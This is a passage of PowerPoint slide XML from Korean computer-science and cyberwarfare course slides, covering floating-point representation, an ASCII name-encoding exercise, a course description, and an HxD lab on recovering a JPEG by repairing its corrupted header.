              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>을 빼 주어 균형을 맞추어 준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="직선 화살표 연결선 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50616DEF-269F-435A-B1E5-3B07C7516789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951798" y="1737630"/>
            <a:ext cx="2374414" cy="6299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6733673-2A13-4236-9CAE-11406FC40DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326212" y="3025759"/>
            <a:ext cx="5160688" cy="303481"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>결과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>실수부</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>2^(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>지수부</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="직선 화살표 연결선 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CAECCBD-D442-49DB-882B-B51DF6D40F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3832529" y="1923042"/>
            <a:ext cx="2493683" cy="12544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DDBE5320-FB6B-47A4-AEAB-5AF3AB3A32FB}"/>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A324E553-EB2D-4D16-B504-F8C7D327951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AC2335D6-8761-4C2E-BBD9-6B3FE9AD237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AEA22662-E76D-4849-97E1-EDC130CE19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080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26" end="2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9"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표현종류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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7C099D7-57F0-4ED9-8ADF-8DA0B84293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89" t="10654" r="3158" b="253"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2697960" y="2066307"/>
            <a:ext cx="5220902" cy="382385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그룹 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FD29E03-545B-4880-AE77-E72F0D1E4911}"/>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F56D0D4E-0EAB-4DDC-B2AB-23FC5838C9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0B1E9FE-845F-45F8-BC9A-683C106D550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AC3B821A-6515-46B0-91C7-F15F4DAA66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5365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ASCII </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>코드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858541"/>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어떻게 대화할까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귀여운 친구를 소개해볼까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임의의 친구 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>한명의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 영어이름을</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코드로 변환한 후</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 에게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학생은 들은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코드를 다시 문자정보로 변환하여 확인한다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87346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눈을 감아도 자꾸자꾸 생각나는 친구가 있다면</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ASCII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코드를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>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87486" y="541799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2D42C6A7-E0C2-477C-809F-5230E750D216}"/>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CB67A61C-FEBA-4FA6-9A89-98B0EABFC0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27F30AA5-AE1D-4197-BD45-7870B7C24D7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E2A4795F-B205-4DC1-923C-E03975D47D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94364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파일 헤더</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중요한 파일을 입수하였는데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도무지 열어볼 수 가 없다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파일이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>변조된것</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잘만 하면</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이 파일이 가진 헤더를 추측할 수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>있을꺼</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파일을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>복원하시오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헤더를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바이너리 분석기를 체험한다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75610" y="499048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33E22309-64C4-4366-A714-2036434D868D}"/>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46CF26B-515B-47B7-8D16-6FD05D2623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34E54C9-5ECE-4409-92B8-C739ACB2B5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8E6E986-75F5-486E-AF36-E8E746E197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78840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00B6792F-6684-4352-A547-72B016DB88D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3586926282"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2609850" y="2417761"/>
          <a:ext cx="6905625" cy="3325813"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="823422">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="857046656"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6082203">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2038668005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1252391">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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교과목</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소개</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="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현대 사이버전의 개념을 이해하고 실무에서 사이버전 수행을 위한 기본능력을 배우는 과목이다</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>현대전에서 사이버전의 중요성을 인식하고 정보보안 소프트웨어를 활용한 실제 사이버전에서 수행되는 공격 및 방어기술을 학습한다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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1193396"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="877902">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교육목표</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사이버전에 대한 개념 이해 및 중요성 인식</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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정보보안 소프트웨어 실습을 통한 사이버전 수행을 위한 기본능력 구비</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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2943351"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1195520">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주교재 및</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="9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참고교재</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주교재</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b="1" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>사이버전 개론</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, / </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>양서각</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3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>군 사관학교 교수일동</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참고교재 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>: 0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>과 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>의 끝없는 전쟁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인포더북스</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손영동</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="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8565554"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F354656A-3117-4843-95C0-A434A45A383A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="42354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117D3CB7-5591-4CFB-B199-17151C66587C}"/>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5C66DA52-85AF-4C75-9592-D165CDBF8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2D80878-1F18-4720-B032-A925CA99B2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FDB6F034-2DA9-4D71-BF27-1A6BBA3FF8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5354445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Download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버튼을 클릭하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>unknown_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Hxd_setup.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 다운받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007A37"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007A37"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007A37"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007A37"/>
                </a:solidFill>
              </a:rPr>
              <a:t>간단한 바이너리 분석 도구</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007A37"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설치를 진행한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a: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ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007A37"/>
              </a:solidFill>
            </a:endParaRP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Hdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>unknown_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>드래그하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 바이너리 형태로 본다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4. 01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>덮혀져있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 부분 아래에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 헤더로 추측되는 부분을 발견한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pP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55E58DEA-2A77-4E9B-8809-934777622021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1437638" y="1476168"/>
            <a:ext cx="3517845" cy="2714169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C71B77D-46B9-48D7-A438-59837F0A120D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6563476" y="774968"/>
            <a:ext cx="4856015" cy="4879858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="직사각형 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58CACCDF-38F9-41AB-8DB0-8B9BBEE4B466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7307249" y="3896139"/>
            <a:ext cx="771276" cy="1192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AF432D13-94BE-472F-A806-A3DBAC6B5A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677512" y="6060796"/>
            <a:ext cx="4902865" cy="303270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="그룹 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DE7998E-353C-4059-B9AE-A7B2DB137590}"/>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9F36BCE-6034-41EC-A30A-11C6E6862C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18A292-CBA6-42AD-BCB1-4FC20913AD7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F5C626A5-37C7-40A2-A389-71994576F0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5417022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추측되는 파일 헤더 앞 부분까지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>블록지정하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>편집 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제를 통해 삭제한다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파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다른 이름으로 저장을 누른 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“known_file.jpg” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 저장한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a: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ED01D8FD-B77C-4142-AA65-D0F65D30F60B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="750339" y="906447"/>
            <a:ext cx="4322593" cy="4670961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84613390-C82A-4963-AD57-0D86757B5E82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6813186" y="906447"/>
            <a:ext cx="4112559" cy="4422686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
